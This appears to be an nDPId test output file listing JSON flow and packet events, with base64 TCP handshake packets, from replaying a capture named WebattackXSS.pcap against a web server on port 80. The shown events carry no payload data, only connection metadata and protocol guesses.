+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347908253,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347908253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XLdAAD4GaRmsEAABwKgKMoSkAFDBACLDAAAAAKACchB2mwAAAgQFtAQCCAoBPH50AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":2,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhKRv9+kSwQAixKAScSDKoQAAAgQFtAQCCAoD5k\/oATx+dAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":3,"flow_last_seen":1499347908254,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347908254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XLhAAD4GaSCsEAABwKgKMoSkAFDBACLEb\/fpE4AQAOVpqQAAAQEICgE8fnQD5k\/o"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347909575,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347909575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/H5AAD4GyVGsEAABwKgKMoSyAFC+M4PAAAAAAKACchAXEwAAAgQFtAQCCAoBPH++AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":2,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhLJ\/QSQIvjODwaAScSAfjwAAAgQFtAQCCAoD5lEzATx\/vgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":3,"flow_last_seen":1499347909576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347909576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/H9AAD4GyVisEAABwKgKMoSyAFC+M4PBf0EkCYAQAOW+lQAAAQEICgE8f78D5lEz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347912141,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347912141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AShAAD4GxKisEAABwKgKMoTMAFAccoNoAAAAAKACchC2kAAAAgQFtAQCCAoBPIJAAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":2,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhMwGDz+bHHKDaaAScSAaKwAAAgQFtAQCCAoD5lO0ATyCQAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7847,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":3,"flow_last_seen":1499347912142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347912142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ASlAAD4GxK+sEAABwKgKMoTMAFAccoNpBg8\/nIAQAOW5MgAAAQEICgE8gkAD5lO0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347913416,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347913416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80\/hAAD4G8desEAABwKgKMoTaAFDALVCHAAAAAKACchBEaQAAAgQFtAQCCAoBPIN\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":2,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhNreW6gWwC1QiKAScSBl\/AAAAgQFtAQCCAoD5lTzATyDfwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":3,"flow_last_seen":1499347913417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347913417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00\/lAAD4G8d6sEAABwKgKMoTaAFDALVCI3luoF4AQAOUFBAAAAQEICgE8g38D5lTz"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347914710,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347914710,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oQ5AAD4GJMKsEAABwKgKMoToAFDafCXMAAAAAKACchBThAAAAgQFtAQCCAoBPITCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7869,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":2,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhOgBH2BK2nwlzaAScSCY3AAAAgQFtAQCCAoD5lY3ATyEwgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":3,"flow_last_seen":1499347914711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347914711,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oQ9AAD4GJMmsEAABwKgKMoToAFDafCXNAR9gS4AQAOU34wAAAQEICgE8hMMD5lY3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347917322,"flow_last_seen":1499347917322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347917322,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1499347917322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917322,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CqdAAD4GuymsEAABwKgKMoUCAFC+4o3oAAAAAKACchAEWwAAAgQFtAQCCAoBPIdPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":2,"flow_last_seen":1499347917323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhQJ4jpXCvuKN6aAScSCaPgAAAgQFtAQCCAoD5ljEATyHTwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":3,"flow_last_seen":1499347917323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347917323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CqhAAD4GuzCsEAABwKgKMoUCAFC+4o3peI6Vw4AQAOU5RQAAAQEICgE8h1AD5ljE"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347918608,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347918608,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vWVAAD4GCGusEAABwKgKMoUQAFB11zX0AAAAAKACchCkCgAAAgQFtAQCCAoBPIiRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":2,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhRAjuy7Uddc19aAScSD0bgAAAgQFtAQCCAoD5loFATyIkQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":3,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vWZAAD4GCHKsEAABwKgKMoUQAFB11zX1I7su1YAQAOWTdgAAAQEICgE8iJED5loF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347921170,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347921170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rYJAAD4GGE6sEAABwKgKMoUqAFCWpCaTAAAAAKACchCQBAAAAgQFtAQCCAoBPIsRAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":2,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhSrhgaXUlqQmlKAScSCpIAAAAgQFtAQCCAoD5lyGATyLEQEDAwc="} 